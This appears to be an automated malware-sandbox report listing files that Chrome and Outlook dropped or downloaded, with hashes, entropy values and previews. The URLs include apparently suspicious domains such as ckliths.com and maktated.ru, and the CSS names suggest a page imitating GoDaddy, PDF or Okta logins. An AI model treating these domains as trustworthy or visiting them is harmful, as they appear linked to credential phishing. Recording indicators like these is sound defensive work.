                                                    Preview:L..................F.@.. ...$+.,....M.H~........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y`.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y`.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y`............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ya............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 18:43:02 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2681
                                                    Entropy (8bit):3.9925796160855658
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:31BCE9E42E46457F918785A5A8DD08C8
                                                    SHA1:5CF9533ED4E997F35E2427FAAC520F133302CCFA
                                                    SHA-256:DFF20A5C08D8B13ADF41690029D7D038FCD2D1B1F6D8C56D04F1850FB58E4B03
                                                    SHA-512:2BDDC64F00E9C984EC1D98924970FE5F5B0E52117B3B6A15B8E84F904287C1E5D7189D6698AA1181B442B83CA1F166FCFF8FEA1EA083437F6860CA91B7C66797
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.....WW~........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y`.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y`.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y`............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ya............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Aug 28 18:43:01 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2683
                                                    Entropy (8bit):4.005584582901683
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B9BC4341E2223FB39EE195D1A7FA8C87
                                                    SHA1:F9A6EFD9C14DF7977F952740C849CE3FC6B26840
                                                    SHA-256:10D4F2929F168AB95818F99F36C11E3298FEFEB81449C59EDBE9A8E2A70A655B
                                                    SHA-512:B0F6E2136CF4D2F95E82BBC49068DF6EF073C758E7AD4FF5625B2D3744ADE3C1CDE79DBF81B12F8B7539B0D2D178CD39AB2B8F82084C2D758074B534B6FF8D73
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,....,.>~........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.YS.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y`.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y`.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y`............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Ya............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............V?......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:Microsoft Outlook email folder (>=2003)
                                                    Category:dropped
                                                    Size (bytes):271360
                                                    Entropy (8bit):2.595772773111692
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F06B0E89069BC44544698BD0A232E07C
                                                    SHA1:4F93057F887434727F74C98C024374331046323F
                                                    SHA-256:6A0ACF5C26753B4BBADA789F40F80EAEF306261E79C364003B5DE69845984107
                                                    SHA-512:B79C7F2163C9088581BC602D0251BA4B588E42F6E9FB3DC9ADD8D56D7D82068F5EA3712E7A8FE5AF462C3BFBDDB35425956B0BC99C29D3BC7007AA74AE71299E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:!BDN4..eSM......\...(...........<.......b................@...........@...@...................................@...........................................................................$.......D.......s..............;...............8...........................................................................................................................................................................................................................................................................................H........Y..f.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):3.8658930076330926
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B49C582F817AD7F66CC3205F886D954D
                                                    SHA1:F1BE4666739223F6FB0C3B128D6E2ACD5557B0F9
                                                    SHA-256:ABC3EA3A1BCF5B38F233C8592041B925625BEB6F9DEA2AFE2AD25003D9D9ADEB
                                                    SHA-512:CAAF348328097E94F8E9B1730E499AB8C0162EE6D56CA8E421CA50310CE382B21EBD5CC06EF0B2B3B5C936572C4714D4A840641E75420EC27B889C1DE6A3FEC2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:..".C...P.......`....0.w......................#.!BDN4..eSM......\...(...........<.......b................@...........@...@...................................@...........................................................................$.......D.......s..............;...............8...........................................................................................................................................................................................................................................................................................H........Y..f....0.w.........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):48316
                                                    Entropy (8bit):5.6346993394709
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:downloaded
                                                    Size (bytes):7390
                                                    Entropy (8bit):4.02755241095864
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                    SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                    SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                    SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/ijB4EAFFFlNfwto2FE5cdja61hNkFkPETXt9kRq56162
                                                    Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):268
                                                    Entropy (8bit):5.111190711619041
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:59759B80E24A89C8CD029B14700E646D
                                                    SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                    SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                    SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                    Category:downloaded
                                                    Size (bytes):36696
                                                    Entropy (8bit):7.988666025644622
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                    SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                    SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                    SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/23oW3uGczlw9Csx8AkRSNc89R4OHQvw70
                                                    Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2681)
                                                    Category:downloaded
                                                    Size (bytes):126460
                                                    Entropy (8bit):5.4944976484967345
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1B556C73C5FC0411A5FA9D71277D8F7C
                                                    SHA1:190D8E5AD5ADB5976211753197BA4B95935B154B
                                                    SHA-256:A79A9AC26A3FACC35971D3ECAA13E2A6B12E666FCBC4AEE6ED857039E81E5E48
                                                    SHA-512:D579216F67DC7C0FC5EDEE463892BC6A045866969251A21CE93403908CEC2C9E889250696E983ABDB2D46F7EAECD3F3055C4428838EE47BDD4789A38667A4495
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.h-1D-JOvizc.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AABA/rs=AHpOoo_3dbjO7NaEjkPT0PwzLRJUFrcOJQ/cb=gapi.loaded_0"
                                                    Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x400000, ]);.var ba,fa,ha,na,oa,sa,ua,wa;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};fa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=ha(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&fa(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)r
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (23648), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):23648
                                                    Entropy (8bit):5.105432676683315
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EA5F78F2084AC770BD4E43FC794ABEFD
                                                    SHA1:3C5D30F496503CA89833A14151C2A9F8A7F72C5E
                                                    SHA-256:D1747D1FD3044146713D389FBC34CFCCC3552A39F4A6505BD8817FD20BB48052
                                                    SHA-512:DEDE8D95C6A7044B8E7EF5C39B5DD63FB4DD01C93DF3D34BA44B1FE73A99EC27B60E41C217AF00FA562A6DADA290000EA45C224BF6E278E717D04936D58798F0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/12P8Pz1XFAhocdF8QE6714
                                                    Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direc
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):550538
                                                    Entropy (8bit):5.675557514253788
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:70306D36CE9DBCBD8E5D1C9913A5210F
                                                    SHA1:04949AD636F8CD09BF91059BC4AAF1973C92A15F
                                                    SHA-256:1425B3DC4E809E5488AAE10E2EB2511F652C6A9C3845C98C3FE69F07FE0C9E2B
                                                    SHA-512:A7F00BA83FEE80E7F2006C9E1F0121E2E515F4956182924E67C95A8C5522F30735F7BF4A6F7DCF3CBD29A685E967B1C4DDFD72D7F1F4CEFBE55326BECDACB275
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var w=function(){return[function(n,T,M,A,E,x,a,U){return((n|1)&((n|(n+8>>(((U=["C",17,"F"],n+6)^8)>=n&&(n+3^8)<n&&(M[U[0]]&&M[U[0]][U[2]]&&(E=M[U[0]][U[2]],x=M.u,x in E&&delete E[x],l[45](50,T,M[U[0]][U[2]],A,M)),M.u=A),4)||(a=HT(M[U[2]],function(W){return typeof W[T]==="function"})),32))==n&&(a=M.u||(M.u=T+(M.VR.G5++).toString(36))),16))<5&&(n^5)>=U[1]&&(a=M!=null&&M.sg===T),a},function(n,T,M,A,E,x,a,U){return(n&(((n|24)==(U=["getValue",43,null],n)&&X.call(this,T),n&52)==n&&(E=H[49](31,M),E!=U[2]&&.E!=U[2]&&(B[19](73,T,0,A),l[3](6,128,T.L,E))),(n<<2&15)>=4&&n+3<22&&T.keyCode==13&&this.L[U[0]]().length==6&&(this.A
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:very short file (no magic)
                                                    Category:downloaded
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://t0ca.maktated.ru/JIyfFjIZbtJyGUMYPuaMqeoFGQZwKTydMMYRSBCLPEJBNSKLRNSUBZRGTMKAKKBPZGPPRAEZDKNFOAISEWW
                                                    Preview:0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (784)
                                                    Category:downloaded
                                                    Size (bytes):789
                                                    Entropy (8bit):5.122770943529344
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:89686EF42A07CA64EF7B709180F137FD
                                                    SHA1:C78606C324C44077307DF846D41C4BC962E4031B
                                                    SHA-256:37533B87C56712ECD8758A2E0F52E39BFB7D164902FC4F04692FF476C38F5E00
                                                    SHA-512:A1F0CC5CDEC1AE94B22F3E736C18A11E85527DEB6358F5BD0EFB8240835DBCBD7D64E1086E1BFDE13D9F8E75D7E1A13B04C416FCEB277EA6EDBBE328BE7914FC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                    Preview:)]}'.["",["philadelphia eagles news","mega millions jackpot lottery numbers","hot wheels mschf car","nasa boeing starliner astronauts","ps plus monthly games","israel museum jar","michigan storm power outages","ohio state football players"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65317)
                                                    Category:downloaded
                                                    Size (bytes):100782
                                                    Entropy (8bit):4.782445110770722
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6386FB409D4A2ABC96EEE7BE8F6D4CC4
                                                    SHA1:09102CFC60EFB430A25EE97CEE9A6A35DF6DFC59
                                                    SHA-256:0DF5A33710E433DE1F5415B1D47E4130CA7466AEE5B81955F1045C4844BBB3ED
                                                    SHA-512:29F91FC180EC2E4225C10A7A2C59E5F3335D2C6C6EF58000D50BF020D92CE0F85C125412BEA73254B2C3F5A3215DDD77B908E85ED10A368B0E59A66A5E07A5D2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                    Preview:/*!. * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):29796
                                                    Entropy (8bit):7.980058333789969
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:210433A8774859368F3A7B86D125A2A7
                                                    SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                    SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                    SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://oivbp.ckliths.com/qrrTSB9tguTRT3FiEnWGvF3FUqC5nMuYN7jdstfK608REX89maf2zE7qzGuef240
                                                    Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (10450)
                                                    Category:downloaded
                                                    Size (bytes):10498
                                                    Entropy (8bit):5.327380141461276
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E0D37A504604EF874BAD26435D62011F
                                                    SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                    SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                    SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                    Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):1400
                                                    Entropy (8bit):7.808470583085035
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:333EE830E5AB72C41DD9126A27B4D878
                                                    SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
